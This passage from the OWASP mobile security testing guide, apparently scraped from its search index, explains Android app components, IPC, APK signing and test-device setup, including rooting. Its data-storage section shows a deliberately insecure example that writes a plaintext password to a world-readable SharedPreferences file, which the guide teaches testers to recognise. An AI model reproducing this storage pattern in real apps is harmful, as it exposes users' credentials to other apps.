The manifest file describes the app structure, its components (activities, services, content providers, and intent receivers), and requested permissions. It also contains general app metadata, such as the app's icon, version number, and theme. The file may list other information, such as compatible APIs (minimal, targeted, and maximal SDK version) and the kind of storage it can be installed on (external or internal).
Here is an example of a manifest file, including the package name (the convention is a reversed URL, but any string is acceptable). It also lists the app version, relevant SDKs, required permissions, exposed content providers, broadcast receivers used with intent filters and a description of the app and its activities:
<manifest\n package=\"com.owasp.myapplication\"\n android:versionCode=\"0.1\" >\n\n <uses-sdk android:minSdkVersion=\"12\"\n android:targetSdkVersion=\"22\"\n android:maxSdkVersion=\"25\" />\n\n <uses-permission android:name=\"android.permission.INTERNET\" />\n\n <provider\n android:name=\"com.owasp.myapplication.MyProvider\"\n android:exported=\"false\" />\n\n <receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.myaction\" />\n </intent-filter>\n </receiver>\n\n <application\n android:icon=\"@drawable/ic_launcher\"\n android:label=\"@string/app_name\"\n android:theme=\"@style/Theme.Material.Light\" >\n <activity\n android:name=\"com.owasp.myapplication.MainActivity\" >\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>\n
The full list of available manifest options is in the official Android Manifest file documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#app-components","title":"App Components","text":"Android apps are made of several high-level components. The main components are:
All these elements are provided by the Android operating system, in the form of predefined classes available through APIs.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#activities","title":"Activities","text":"Activities make up the visible part of any app. There is one activity per screen, so an app with three different screens implements three different activities. Activities are declared by extending the Activity class. They contain all user interface elements: fragments, views, and layouts.
Each activity needs to be declared in the Android Manifest with the following syntax:
<activity android:name=\"ActivityName\">\n</activity>\n
Activities not declared in the manifest can't be displayed, and attempting to launch them will raise an exception.
Like apps, activities have their own life cycle and need to monitor system changes to handle them. Activities can be in the following states: active, paused, stopped, and inactive. These states are managed by the Android operating system. Accordingly, activities can implement the following event managers:
An app may not explicitly implement all event managers, in which case default actions are taken. Typically, at least the onCreate
manager is overridden by the app developers. This is how most user interface components are declared and initialized. onDestroy
may be overridden when resources (like network connections or connections to databases) must be explicitly released or specific actions must occur when the app shuts down.
A fragment represents a behavior or a portion of the user interface within the activity. Fragments were introduced in Android with version Honeycomb 3.0 (API level 11).
Fragments are meant to encapsulate parts of the interface to facilitate re-usability and adaptation to different screen sizes. Fragments are autonomous entities in that they include all their required components (they have their own layout, buttons, etc.). However, they must be integrated with activities to be useful: fragments can't exist on their own. They have their own life cycle, which is tied to the life cycle of the Activities that implement them.
Because fragments have their own life cycle, the Fragment class contains event managers that can be redefined and extended. These event managers include onAttach, onCreate, onStart, onDestroy and onDetach. Several others exist; the reader should refer to the Android Fragment specification for more details.
Fragments can be easily implemented by extending the Fragment class provided by Android:
Example in Java:
public class MyFragment extends Fragment {\n ...\n}\n
Example in Kotlin:
class MyFragment : Fragment() {\n ...\n}\n
Fragments don't need to be declared in manifest files because they depend on activities.
To manage its fragments, an activity can use a Fragment Manager (FragmentManager class). This class makes it easy to find, add, remove, and replace associated fragments.
Fragment Managers can be created via the following:
Example in Java:
FragmentManager fm = getFragmentManager();\n
Example in Kotlin:
var fm = fragmentManager\n
Fragments don't necessarily have a user interface; they can be a convenient and efficient way to manage background operations pertaining to the app's user interface. A fragment may be declared persistent so that the system preserves its state even if its Activity is destroyed.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#content-providers","title":"Content Providers","text":"Android uses SQLite to store data permanently: as with Linux, data is stored in files. SQLite is a light, efficient, open source relational data storage technology that does not require much processing power, which makes it ideal for mobile use. An entire API with specific classes (Cursor, ContentValues, SQLiteOpenHelper, ContentProvider, ContentResolver, etc.) is available. SQLite is not run as a separate process; it is part of the app. By default, a database belonging to a given app is accessible to this app only. However, content providers offer a great mechanism for abstracting data sources (including databases and flat files); they also provide a standard and efficient mechanism to share data between apps, including native apps. To be accessible to other apps, a content provider needs to be explicitly declared in the manifest file of the app that will share it. As long as content providers aren't declared, they won't be exported and can only be called by the app that creates them.
Content providers are implemented through a URI addressing scheme: they all use the content:// model. Regardless of the type of sources (SQLite database, flat file, etc.), the addressing scheme is always the same, thereby abstracting the sources and offering the developer a unique scheme. Content providers offer all regular database operations: create, read, update, delete. That means that any app with proper rights in its manifest file can manipulate the data from other apps.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#services","title":"Services","text":"Services are Android OS components (based on the Service class) that perform tasks in the background (data processing, starting intents, and notifications, etc.) without presenting a user interface. Services are meant to run processes long-term. Their system priorities are lower than those of active apps and higher than those of inactive apps. Therefore, they are less likely to be killed when the system needs resources, and they can be configured to automatically restart when enough resources become available. This makes services a great candidate for running background tasks. Please note that Services, like Activities, are executed in the main app thread. A service does not create its own thread and does not run in a separate process unless you specify otherwise.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#inter-process-communication","title":"Inter-Process Communication","text":"As we've already learned, every Android process has its own sandboxed address space. Inter-process communication facilities allow apps to exchange signals and data securely. Instead of relying on the default Linux IPC facilities, Android's IPC is based on Binder, a custom implementation of OpenBinder. Most Android system services and all high-level IPC services depend on Binder.
The term Binder stands for a lot of different things, including:
The Binder framework includes a client-server communication model. To use IPC, apps call IPC methods in proxy objects. The proxy objects transparently marshall the call parameters into a parcel and send a transaction to the Binder server, which is implemented as a character driver (/dev/binder). The server holds a thread pool for handling incoming requests and delivers messages to the destination object. From the perspective of the client app, all of this seems like a regular method call, all the heavy lifting is done by the Binder framework.
Services that allow other applications to bind to them are called bound services. These services must provide an IBinder interface to clients. Developers use the Android Interface Descriptor Language (AIDL) to write interfaces for remote services.
ServiceManager is a system daemon that manages the registration and lookup of system services. It maintains a list of name/Binder pairs for all registered services. Services are added with addService
and retrieved by name with the static getService
method in android.os.ServiceManager
:
Example in Java:
public static IBinder getService(String name) {\n try {\n IBinder service = sCache.get(name);\n if (service != null) {\n return service;\n } else {\n return getIServiceManager().getService(name);\n }\n } catch (RemoteException e) {\n Log.e(TAG, \"error in getService\", e);\n }\n return null;\n }\n
Example in Kotlin:
companion object {\n private val sCache: Map<String, IBinder> = ArrayMap()\n fun getService(name: String): IBinder? {\n try {\n val service = sCache[name]\n return service ?: getIServiceManager().getService(name)\n } catch (e: RemoteException) {\n Log.e(FragmentActivity.TAG, \"error in getService\", e)\n }\n return null\n }\n }\n
You can query the list of system services with the service list
command.
$ adb shell service list\nFound 99 services:\n0 carrier_config: [com.android.internal.telephony.ICarrierConfigLoader]\n1 phone: [com.android.internal.telephony.ITelephony]\n2 isms: [com.android.internal.telephony.ISms]\n3 iphonesubinfo: [com.android.internal.telephony.IPhoneSubInfo]\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#intents","title":"Intents","text":"Intent messaging is an asynchronous communication framework built on top of Binder. This framework allows both point-to-point and publish-subscribe messaging. An Intent is a messaging object that can be used to request an action from another app component. Although intents facilitate inter-component communication in several ways, there are three fundamental use cases:
startActivity
. The intent describes the activity and carries necessary data.sendBroadcast
or sendOrderedBroadcast
.There are two types of intents. Explicit intents name the component that will be started (the fully qualified class name). For instance:
Example in Java:
Intent intent = new Intent(this, myActivity.myClass);\n
Example in Kotlin:
var intent = Intent(this, myActivity.myClass)\n
Implicit intents are sent to the OS to perform a given action on a given set of data (The URL of the OWASP website in our example below). It is up to the system to decide which app or class will perform the corresponding service. For instance:
Example in Java:
Intent intent = new Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"));\n
Example in Kotlin:
var intent = Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"))\n
An intent filter is an expression in Android Manifest files that specifies the type of intents the component would like to receive. For instance, by declaring an intent filter for an activity, you make it possible for other apps to directly start your activity with a certain kind of intent. Likewise, your activity can only be started with an explicit intent if you don't declare any intent filters for it.
Android uses intents to broadcast messages to apps (such as an incoming call or SMS), important power supply information (low battery, for example), and network changes (loss of connection, for instance). Extra data may be added to intents (through putExtra
/getExtras
).
Here is a short list of intents sent by the operating system. All constants are defined in the Intent class, and the whole list is in the official Android documentation:
To improve security and privacy, a Local Broadcast Manager is used to send and receive intents within an app without having them sent to the rest of the operating system. This is very useful for ensuring that sensitive and private data don't leave the app perimeter (geolocation data for instance).
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#broadcast-receivers","title":"Broadcast Receivers","text":"Broadcast Receivers are components that allow apps to receive notifications from other apps and from the system itself. With them, apps can react to events (internal, initiated by other apps, or initiated by the operating system). They are generally used to update user interfaces, start services, update content, and create user notifications.
There are two ways to make a Broadcast Receiver known to the system. One way is to declare it in the Android Manifest file. The manifest should specify an association between the Broadcast Receiver and an intent filter to indicate the actions the receiver is meant to listen for.
An example Broadcast Receiver declaration with an intent filter in a manifest:
<receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.MY_ACTION\" />\n </intent-filter>\n</receiver>\n
Please note that in this example, the Broadcast Receiver does not include the android:exported
attribute. As at least one filter was defined, the default value will be set to \"true\". In absence of any filters, it will be set to \"false\".
The other way is to create the receiver dynamically in code. The receiver can then register with the method Context.registerReceiver
.
An example of registering a Broadcast Receiver dynamically:
Example in Java:
// Define a broadcast receiver\nBroadcastReceiver myReceiver = new BroadcastReceiver() {\n @Override\n public void onReceive(Context context, Intent intent) {\n Log.d(TAG, \"Intent received by myReceiver\");\n }\n};\n// Define an intent filter with actions that the broadcast receiver listens for\nIntentFilter intentFilter = new IntentFilter();\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\");\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter);\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver);\n
Example in Kotlin:
// Define a broadcast receiver\nval myReceiver: BroadcastReceiver = object : BroadcastReceiver() {\n override fun onReceive(context: Context, intent: Intent) {\n Log.d(FragmentActivity.TAG, \"Intent received by myReceiver\")\n }\n}\n// Define an intent filter with actions that the broadcast receiver listens for\nval intentFilter = IntentFilter()\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\")\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter)\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver)\n
Note that the system starts an app with the registered receiver automatically when a relevant intent is raised.
According to Broadcasts Overview, a broadcast is considered \"implicit\" if it does not target an app specifically. After receiving an implicit broadcast, Android will list all apps that have registered a given action in their filters. If more than one app has registered for the same action, Android will prompt the user to select from the list of available apps.
An interesting feature of Broadcast Receivers is that they can be prioritized; this way, an intent will be delivered to all authorized receivers according to their priority. A priority can be assigned to an intent filter in the manifest via the android:priority
attribute as well as programmatically via the IntentFilter.setPriority
method. However, note that receivers with the same priority will be run in an arbitrary order.
If your app is not supposed to send broadcasts across apps, use a Local Broadcast Manager (LocalBroadcastManager
). They can be used to make sure intents are received from the internal app only, and any intent from any other app will be discarded. This is very useful for improving security and the efficiency of the app, as no interprocess communication is involved. However, please note that the LocalBroadcastManager
class is deprecated and Google recommends using alternatives such as LiveData
.
For more security considerations regarding Broadcast Receiver, see Security Considerations and Best Practices.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#implicit-broadcast-receiver-limitation","title":"Implicit Broadcast Receiver Limitation","text":"According to Background Optimizations, apps targeting Android 7.0 (API level 24) or higher no longer receive CONNECTIVITY_ACTION
broadcast unless they register their Broadcast Receivers with Context.registerReceiver()
. The system does not send ACTION_NEW_PICTURE
and ACTION_NEW_VIDEO
broadcasts as well.
According to Background Execution Limits, apps that target Android 8.0 (API level 26) or higher can no longer register Broadcast Receivers for implicit broadcasts in their manifest, except for those listed in Implicit Broadcast Exceptions. The Broadcast Receivers created at runtime by calling Context.registerReceiver
are not affected by this limitation.
According to Changes to System Broadcasts, beginning with Android 9 (API level 28), the NETWORK_STATE_CHANGED_ACTION
broadcast doesn't receive information about the user's location or personally identifiable data.
Once an app has been successfully developed, the next step is to publish and share it with others. However, apps can't simply be added to a store and shared; they must first be signed. The cryptographic signature serves as a verifiable mark placed by the developer of the app. It identifies the app\u2019s author and ensures that the app has not been modified since its initial distribution.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-process","title":"Signing Process","text":"During development, apps are signed with an automatically generated certificate. This certificate is inherently insecure and is for debugging only. Most stores don't accept this kind of certificate for publishing; therefore, a certificate with more secure features must be created. When an application is installed on the Android device, the Package Manager ensures that it has been signed with the certificate included in the corresponding APK. If the certificate's public key matches the key used to sign any other APK on the device, the new APK may share a UID with the pre-existing APK. This facilitates interactions between applications from a single vendor. Alternatively, specifying security permissions for the Signature protection level is possible; this will restrict access to applications that have been signed with the same key.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signing-schemes","title":"APK Signing Schemes","text":"Android supports three application signing schemes. Starting with Android 9 (API level 28), APKs can be verified with APK Signature Scheme v3 (v3 scheme), APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For Android 7.0 (API level 24) and above, APKs can be verified with the APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For backwards compatibility, an APK can be signed with multiple signature schemes in order to make the app run on both newer and older SDK versions. Older platforms ignore v2 signatures and verify v1 signatures only.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#jar-signing-v1-scheme","title":"JAR Signing (v1 Scheme)","text":"The original version of app signing implements the signed APK as a standard signed JAR, which must contain all the entries in META-INF/MANIFEST.MF
. All files must be signed with a common certificate. This scheme does not protect some parts of the APK, such as ZIP metadata. The drawback of this scheme is that the APK verifier needs to process untrusted data structures before applying the signature, and the verifier discards data the data structures don't cover. Also, the APK verifier must decompress all compressed files, which takes considerable time and memory.
With the APK signature scheme, the complete APK is hashed and signed, and an APK Signing Block is created and inserted into the APK. During validation, the v2 scheme checks the signatures of the entire APK file. This form of APK verification is faster and offers more comprehensive protection against modification. You can see the APK signature verification process for v2 Scheme below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v3-scheme","title":"APK Signature Scheme (v3 Scheme)","text":"The v3 APK Signing Block format is the same as v2. V3 adds information about the supported SDK versions and a proof-of-rotation struct to the APK signing block. In Android 9 (API level 28) and higher, APKs can be verified according to APK Signature Scheme v3, v2 or v1 scheme. Older platforms ignore v3 signatures and try to verify v2 then v1 signature.
The proof-of-rotation attribute in the signed-data of the signing block consists of a singly-linked list, with each node containing a signing certificate used to sign previous versions of the app. To make backward compatibility work, the old signing certificates sign the new set of certificates, thus providing each new key with evidence that it should be as trusted as the older key(s). It is no longer possible to sign APKs independently, because the proof-of-rotation structure must have the old signing certificates signing the new set of certificates, rather than signing them one-by-one. You can see the APK signature v3 scheme verification process below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v4-scheme","title":"APK Signature Scheme (v4 Scheme)","text":"The APK Signature Scheme v4 was introduced along with Android 11 (API level 30) and requires all devices launched with Android 11 and up to have fs-verity enabled by default. fs-verity is a Linux kernel feature that is primarily used for file authentication (detection of malicious modifications) due to its extremely efficient file hash calculation. Read requests only will succeed if the content verifies against trusted digital certificates that were loaded to the kernel keyring during boot time.
The v4 signature requires a complementary v2 or v3 signature and in contrast to previous signature schemes, the v4 signature is stored in a separate file <apk name>.apk.idsig
. Remember to specify it using the --v4-signature-file
flag when verifying a v4-signed APK with apksigner verify
.
You can find more detailed information in the Android developer documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#creating-your-certificate","title":"Creating Your Certificate","text":"Android uses public/private certificates to sign Android apps (.apk files). Certificates are bundles of information; in terms of security, keys are the most important part of that bundle. Public certificates contain users' public keys, and private certificates contain users' private keys. Public and private certificates are linked. Certificates are unique and can't be re-generated. Note that if a certificate is lost, it cannot be recovered, so updating any apps signed with that certificate becomes impossible. App creators can either reuse an existing private/public key pair that is in an available KeyStore or generate a new pair. In the Android SDK, a new key pair is generated with the keytool
command. The following command creates a RSA key pair with a key length of 2048 bits and an expiry time of 7300 days = 20 years. The generated key pair is stored in the file 'myKeyStore.jks', which is in the current directory:
keytool -genkey -alias myDomain -keyalg RSA -keysize 2048 -validity 7300 -keystore myKeyStore.jks -storepass myStrongPassword\n
Safely storing your secret key and making sure it remains secret during its entire life cycle is of paramount importance. Anyone who gains access to the key will be able to publish updates to your apps with content that you don't control (thereby adding insecure features or accessing shared content with signature-based permissions). The trust that a user places in an app and its developers is based totally on such certificates; certificate protection and secure management are therefore vital for reputation and customer retention, and secret keys must never be shared with other individuals. Keys are stored in a binary file that can be protected with a password; such files are referred to as KeyStores. KeyStore passwords should be strong and known only to the key creator. For this reason, keys are usually stored on a dedicated build machine that developers have limited access to. An Android certificate must have a validity period that's longer than that of the associated app (including updated versions of the app). For example, Google Play will require certificates to remain valid until Oct 22nd, 2033 at least.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-an-application","title":"Signing an Application","text":"The goal of the signing process is to associate the app file (.apk) with the developer's public key. To achieve this, the developer calculates a hash of the APK file and encrypts it with their own private key. Third parties can then verify the app's authenticity (e.g., the fact that the app really comes from the user who claims to be the originator) by decrypting the encrypted hash with the author\u2019s public key and verifying that it matches the actual hash of the APK file.
Many Integrated Development Environments (IDE) integrate the app signing process to make it easier for the user. Be aware that some IDEs store private keys in clear text in configuration files; double-check this in case others are able to access such files and remove the information if necessary. Apps can be signed from the command line with the 'apksigner' tool provided by the Android SDK (API level 24 and higher). It is located at [SDK-Path]/build-tools/[version]
. For API 24.0.2 and below, you can use 'jarsigner', which is part of the Java JDK. Details about the whole process can be found in official Android documentation; however, an example is given below to illustrate the point.
apksigner sign --out mySignedApp.apk --ks myKeyStore.jks myUnsignedApp.apk\n
In this example, an unsigned app ('myUnsignedApp.apk') will be signed with a private key from the developer KeyStore 'myKeyStore.jks' (located in the current directory). The app will become a signed app called 'mySignedApp.apk' and will be ready to release to stores.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zipalign","title":"Zipalign","text":"The zipalign
tool should always be used to align the APK file before distribution. This tool aligns all uncompressed data (such as images, raw files, and 4-byte boundaries) within the APK, which helps improve memory management during app runtime.
Zipalign must be used before the APK file is signed with apksigner.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#publishing-process","title":"Publishing Process","text":"Distributing apps from anywhere (your own site, any store, etc.) is possible because the Android ecosystem is open. However, Google Play is the most well-known, trusted, and popular store, and Google itself provides it. Amazon Appstore is the trusted default store for Kindle devices. If users want to install third-party apps from a non-trusted source, they must explicitly allow this with their device security settings.
Apps can be installed on an Android device from a variety of sources: locally via USB, via Google's official app store (Google Play Store) or from alternative stores.
Whereas other vendors may review and approve apps before they are actually published, Google will simply scan for known malware signatures; this minimizes the time between the beginning of the publishing process and public app availability.
Publishing an app is quite straightforward; the main operation is making the signed APK file downloadable. On Google Play, publishing starts with account creation and is followed by app delivery through a dedicated interface. Details are available at the official Android documentation.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/","title":"Android Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of Android apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#android-testing-setup","title":"Android Testing Setup","text":"You can set up a fully functioning test environment on almost any machine running Windows, Linux, or macOS.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#host-device","title":"Host Device","text":"At the very least, you'll need Android Studio (which comes with the Android SDK) platform tools, an emulator, and an app to manage the various SDK versions and framework components. Android Studio also comes with an Android Virtual Device (AVD) Manager application for creating emulator images. Make sure that the newest SDK tools and platform tools packages are installed on your system.
In addition, you may want to complete your host setup by installing the Android NDK if you're planning to work with apps containing native libraries.
Sometimes it can be useful to display or control devices from the computer. To achieve this, you can use Scrcpy.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-device","title":"Testing Device","text":"For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on a emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices. A full overview of the pros and cons of each approach is listed in the table below.
Property Physical Emulator/Simulator Ability to restore Softbricks are always possible, but new firmware can typically still be flashed. Hardbricks are very rare. Emulators can crash or become corrupt, but a new one can be created or a snapshot can be restored. Reset Can be restored to factory settings or reflashed. Emulators can be deleted and recreated. Snapshots Not possible. Supported, great for malware analysis. Speed Much faster than emulators. Typically slow, but improvements are being made. Cost Typically start at $200 for a usable device. You may require different devices, such as one with or without a biometric sensor. Both free and commercial solutions exist. Ease of rooting Highly dependent on the device. Typically rooted by default. Ease of emulator detection It's not an emulator, so emulator checks are not applicable. Many artefacts will exist, making it easy to detect that the app is running in an emulator. Ease of root detection Easier to hide root, as many root detection algorithms check for emulator properties. With Magisk Systemless root it's nearly impossible to detect. Emulators will almost always trigger root detection algorithms due to the fact that they are built for testing with many artefacts that can be found. Hardware interaction Easy interaction through Bluetooth, NFC, 4G, Wi-Fi, biometrics, camera, GPS, gyroscope, ... Usually fairly limited, with emulated hardware input (e.g. random GPS coordinates) API level support Depends on the device and the community. Active communities will keep distributing updated versions (e.g. LineageOS), while less popular devices may only receive a few updates. Switching between versions requires flashing the device, a tedious process. Always supports the latest versions, including beta releases. Emulators containing specific API levels can easily be downloaded and launched. Native library support Native libraries are usually built for ARM devices, so they will work on a physical device. 
Some emulators run on x86 CPUs, so they may not be able to run packaged native libraries. Malware danger Malware samples can infect a device, but if you can clear out the device storage and flash a clean firmware, thereby restoring it to factory settings, this should not be a problem. Be aware that there are malware samples that try to exploit the USB bridge. Malware samples can infect an emulator, but the emulator can simply be removed and recreated. It is also possible to create snapshots and compare different snapshots to help in malware analysis. Be aware that there are malware proofs of concept which try to attack the hypervisor."},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-a-real-device","title":"Testing on a Real Device","text":"Almost any physical device can be used for testing, but there are a few considerations to be made. First, the device needs to be rootable. This is typically either done through an exploit, or through an unlocked bootloader. Exploits are not always available, and the bootloader may be locked permanently, or it may only be unlocked once the carrier contract has been terminated.
The best candidates are flagship Google Pixel devices built for developers. These devices typically come with an unlockable bootloader, open source firmware, kernel, radio available online and official OS source code. The developer communities prefer Google devices as the OS is closest to the Android Open Source Project. These devices generally have the longest support windows with 2 years of OS updates and 1 year of security updates after that.
Alternatively, Google's Android One project contains devices that will receive the same support windows (2 years of OS updates, 1 year of security updates) and have near-stock experiences. While it was originally started as a project for low-end devices, the program has evolved to include mid-range and high-end smartphones, many of which are actively supported by the modding community.
Devices that are supported by the LineageOS project are also very good candidates for test devices. They have an active community, easy to follow flashing and rooting instructions and the latest Android versions are typically quickly available as a Lineage installation. LineageOS also continues support for new Android versions long after the OEM has stopped distributing updates.
When working with an Android physical device, you'll want to enable Developer Mode and USB debugging on the device in order to use the ADB debugging interface. Since Android 4.2 (API level 16), the Developer options sub menu in the Settings app is hidden by default. To activate it, tap the Build number section of the About phone view seven times. Note that the build number field's location varies slightly by device. For example, on LG Phones, it is under About phone -> Software information. Once you have done this, Developer options will be shown at the bottom of the Settings menu. Once developer options are activated, you can enable debugging with the USB debugging switch.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Multiple emulators exist, once again with their own strengths and weaknesses:
Free emulators:
Commercial emulators:
Although there exist several free Android emulators, we recommend using AVD as it provides enhanced features appropriate for testing your app compared to the others. In the remainder of this guide, we will use the official AVD to perform tests.
AVD supports some hardware emulation, such as GPS or SMS through its so-called Extended Controls as well as motion sensors.
You can either start an Android Virtual Device (AVD) by using the AVD Manager in Android Studio or start the AVD manager from the command line with the android
command, which is found in the tools directory of the Android SDK:
./android avd\n
Several tools and VMs that can be used to test an app within an emulator environment are available:
Please also verify the \"Testing Tools\" chapter at the end of this book.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"Rooting (i.e., modifying the OS so that you can run commands as the root user) is recommended for testing on a real device. This gives you full control over the operating system and allows you to bypass restrictions such as app sandboxing. These privileges in turn allow you to use techniques like code injection and function hooking more easily.
Note that rooting is risky, and three main consequences need to be clarified before you proceed. Rooting can have the following negative effects:
You should not root a personal device that you store your private information on. We recommend getting a cheap, dedicated test device instead. Many older devices, such as Google's Nexus series, can run the newest Android versions and are perfectly fine for testing.
You need to understand that rooting your device is ultimately YOUR decision and that OWASP shall in no way be held responsible for any damage. If you're uncertain, seek expert advice before starting the rooting process.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#which-mobiles-can-be-rooted","title":"Which Mobiles Can Be Rooted","text":"Virtually any Android mobile can be rooted. Commercial versions of Android OS (which are Linux OS evolutions at the kernel level) are optimized for the mobile world. Some features have been removed or disabled for these versions, for example, non-privileged users' ability to become the 'root' user (who has elevated privileges). Rooting a phone means allowing users to become the root user, e.g., adding a standard Linux executable called su
, which is used to change to another user account.
To root a mobile device, first unlock its boot loader. The unlocking procedure depends on the device manufacturer. However, for practical reasons, rooting some mobile devices is more popular than rooting others, particularly when it comes to security testing: devices created by Google and manufactured by companies like Samsung, LG, and Motorola are among the most popular, particularly because they are used by many developers. The device warranty is not nullified when the boot loader is unlocked and Google provides many tools to support the root itself.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#rooting-with-magisk","title":"Rooting with Magisk","text":"Magisk (\"Magic Mask\") is one way to root your Android device. Its specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Furthermore, developers can use the power of Magisk to create custom modules and submit them to the official Magisk Modules repository. Submitted modules can then be installed inside the Magisk Manager application. One of these installable modules is a systemless version of the famous Xposed Framework (available for SDK versions up to 27).
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#root-detection","title":"Root Detection","text":"An extensive list of root detection methods is presented in the \"Testing Anti-Reversing Defenses on Android\" chapter.
For a typical mobile app security build, you'll usually want to test a debug build with root detection disabled. If such a build is not available for testing, you can disable root detection in a variety of ways that will be introduced later in this book.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/","title":"Android Data Storage","text":""},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#overview","title":"Overview","text":"This chapter discusses the importance of securing sensitive data, like authentication tokens and private information, vital for mobile security. We'll look at Android's APIs for local data storage and share best practices.
While it's preferable to limit sensitive data on local storage, or avoid it altogether whenever possible, practical use cases often necessitate user data storage. For example, to improve user experience, apps cache authentication tokens locally, circumventing the need for complex password entry at each app start. Apps may also need to store personally identifiable information (PII) and other sensitive data.
Sensitive data can become vulnerable if improperly protected, potentially stored in various locations, including the device or an external SD card. It's important to identify the information processed by the mobile app and classify what counts as sensitive data. Check out the \"Identifying Sensitive Data\" section in the \"Mobile App Security Testing\" chapter for data classification details. Refer to Security Tips for Storing Data in the Android developer's guide for comprehensive insights.
Sensitive information disclosure risks include potential information decryption, social engineering attacks (if PII is disclosed), account hijacking (if session information or an authentication token is disclosed), and app exploitation with a payment option.
In addition to data protection, validate and sanitize data from any storage source. This includes checking correct data types and implementing cryptographic controls, such as HMACs, for data integrity.
Android offers various data storage methods, tailored to users, developers, and applications. Common persistent storage techniques include:
Additionally, other Android functions that can result in data storage and should be tested include:
Understanding each relevant data storage function is crucial for performing the appropriate test cases. This overview provides a brief outline of these data storage methods and points testers to further relevant documentation.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#shared-preferences","title":"Shared Preferences","text":"The SharedPreferences API is commonly used to permanently save small collections of key-value pairs. Data stored in a SharedPreferences object is written to a plain-text XML file. The SharedPreferences object can be declared world-readable (accessible to all apps) or private. Misuse of the SharedPreferences API can often lead to exposure of sensitive data. Consider the following example:
Example for Java:
SharedPreferences sharedPref = getSharedPreferences(\"key\", MODE_WORLD_READABLE);\nSharedPreferences.Editor editor = sharedPref.edit();\neditor.putString(\"username\", \"administrator\");\neditor.putString(\"password\", \"supersecret\");\neditor.commit();\n
Example for Kotlin:
var sharedPref = getSharedPreferences(\"key\", Context.MODE_WORLD_READABLE)\nvar editor = sharedPref.edit()\neditor.putString(\"username\", \"administrator\")\neditor.putString(\"password\", \"supersecret\")\neditor.commit()\n
Once the activity has been called, the file key.xml will be created with the provided data. This code violates several best practices.
/data/data/<package-name>/shared_prefs/key.xml
.<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n <string name=\"username\">administrator</string>\n <string name=\"password\">supersecret</string>\n</map>\n
MODE_WORLD_READABLE
allows all applications to access and read the contents of key.xml
.root@hermes:/data/data/sg.vp.owasp_mobile.myfirstapp/shared_prefs # ls -la\n-rw-rw-r-- u0_a118 170 2016-04-23 16:51 key.xml\n
Please note that MODE_WORLD_READABLE
and MODE_WORLD_WRITEABLE
were deprecated starting on API level 17. Although newer devices may not be affected by this, applications compiled with an android:targetSdkVersion
value less than 17 may be affected if they run on an OS version that was released before Android 4.2 (API level 17).
The Android platform provides a number of database options, as mentioned in the previous list. Each database option has its own quirks and methods that need to be understood.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-database-unencrypted","title":"SQLite Database (Unencrypted)","text":"SQLite is an SQL database engine that stores data in .db
files. The Android SDK has built-in support for SQLite databases. The main package used to manage the databases is android.database.sqlite
. For example, you may use the following code to store sensitive information within an activity:
Example in Java:
